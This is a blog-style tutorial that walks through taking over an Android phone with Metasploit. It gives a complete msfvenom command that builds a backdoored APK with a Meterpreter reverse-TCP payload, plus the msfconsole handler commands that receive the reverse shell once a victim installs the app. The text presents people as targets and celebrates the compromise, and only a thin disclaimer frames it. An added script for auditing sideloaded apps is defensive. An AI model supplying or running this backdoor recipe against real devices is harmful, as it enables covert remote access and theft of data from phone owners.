How to Hack Android Smartphone Using Metasploit

Hello friends, how are you? I hope everything is going great 😀 Today we will be talking about hacking an Android smartphone using Metasploit.

Important: All the details shown in this article are for educational purposes only, and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to mind after hearing this is: why in the world would we want to hack Android phones? The answer to that question is really simple: the majority of people out there are Android users, so you have a lot of victims to target 😀

But seriously, don’t hack anyone’s device without their permission, or you can get into a lot of trouble for doing Android hacking.

What is Android?

According to Wikipedia:

Android is an operating system based on Linux Kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers.

Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words, it is an open-source framework: a tool for creating exploits against remote victims, and it also comes with a whole list of readily available exploits.

It is a favorite tool of security researchers and ethical hackers for performing their attacks. It makes it super simple to create different payloads for different operating systems and platforms.

Metasploit for Android Hacking?

What method will we be using to hack the phone? We are going to create a backdoor and install it on the victim’s phone.

What is Backdoor?

A backdoor is a method of bypassing authentication in a product, computer, etc. Backdoors are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto Google’s Android OS. It is similar to an MSI package or a Deb package on Linux-based operating systems.

Requirements:-

  1. Metasploit Framework (Pre-Installed in Kali Linux)
  2. Victim’s Android Smartphone (Unfortunately that is my phone)

Step By Step Hacking Android Phone Using Metasploit:

So now let’s get into it.

  1. Open Terminal.
  2. We are going to use msfvenom, the Metasploit Framework's payload generator, to create the exploit/backdoor for this tutorial.
  3. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk


Let me explain the above command. We are using msfvenom as the payload generator for Android, with Meterpreter making the reverse connection to the attacker's system. LHOST defines the attacker's IP address, where he will receive the reverse connection from the victim. Likewise, LPORT is the port on which the connection will be made, here 4444, and R > hack.apk is used to write out the generated executable.


Now we are ready for the next step. Because this payload uses reverse_tcp, the attacker will be listening on the port specified in the payload for a reverse connection from the victim.

So now we need to set up a handler for incoming connections to that port. Let’s do it.

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

Now we will set where the attacker system listens for incoming connections.

set lhost 192.168.1.104

set lport 4444

exploit 

Remember that LHOST and LPORT are the attacker's IP address and the port on which to listen for the reverse connection, and exploit starts the listening.

Now, as soon as the victim installs the APK exploit/backdoor, you will get the reverse Meterpreter session on your terminal like this.

Here we have some information that we have extracted from the Android system, so the victim's phone has been completely owned.

The successful hack dance  😈  😈

 

So after all this explanation, what we have learned is: never install apps from unknown sources 😀 or else you are completely screwed :3
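
One way to act on that advice, as an added example that is not part of the original article: the script below audits the output of `adb shell pm list packages -i -3` (third-party packages with their installer) and lists apps that did not come from a trusted store. The allowlist, the function name and the sample listing are assumptions constructed for illustration.

```python
import re

# Assumption: the installers you trust. com.android.vending is Google Play.
TRUSTED_INSTALLERS = {"com.android.vending"}

# Expected line shape: "package:<name>  installer=<installer or null>"
LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<installer>\S+)$")

# Constructed sample of `adb shell pm list packages -i -3` output.
SAMPLE_LISTING = """\
package:com.example.notes  installer=com.android.vending
package:com.example.flashlight  installer=null
package:com.example.game  installer=com.google.android.packageinstaller

package:com.example.broken
"""

def audit_installers(listing, trusted=TRUSTED_INSTALLERS):
    """Return (sideloaded, unparsed).

    sideloaded: sorted list of (package, installer) for every package whose
                installer is not in `trusted`; installer is None when the
                device reports "null" (for example an install over adb).
    unparsed:   lines that did not match the expected shape, kept so that a
                format change is noticed instead of silently ignored.
    """
    sideloaded, unparsed = [], []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = LINE_RE.match(line)
        if match is None:
            unparsed.append(line)
            continue
        installer = match["installer"]
        if installer not in trusted:
            sideloaded.append(
                (match["pkg"], None if installer == "null" else installer)
            )
    return sorted(sideloaded, key=lambda item: item[0]), unparsed

if __name__ == "__main__":
    flagged, skipped = audit_installers(SAMPLE_LISTING)
    for pkg, installer in flagged:
        print(f"REVIEW {pkg} (installer: {installer or 'none recorded'})")
    for line in skipped:
        print(f"UNPARSED {line}")
```

A flagged package is not necessarily malicious; it is one that bypassed the store and deserves a manual look at its permissions and origin.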


If you have any questions, do comment below and we will try our best to help you out. Do share with your friends.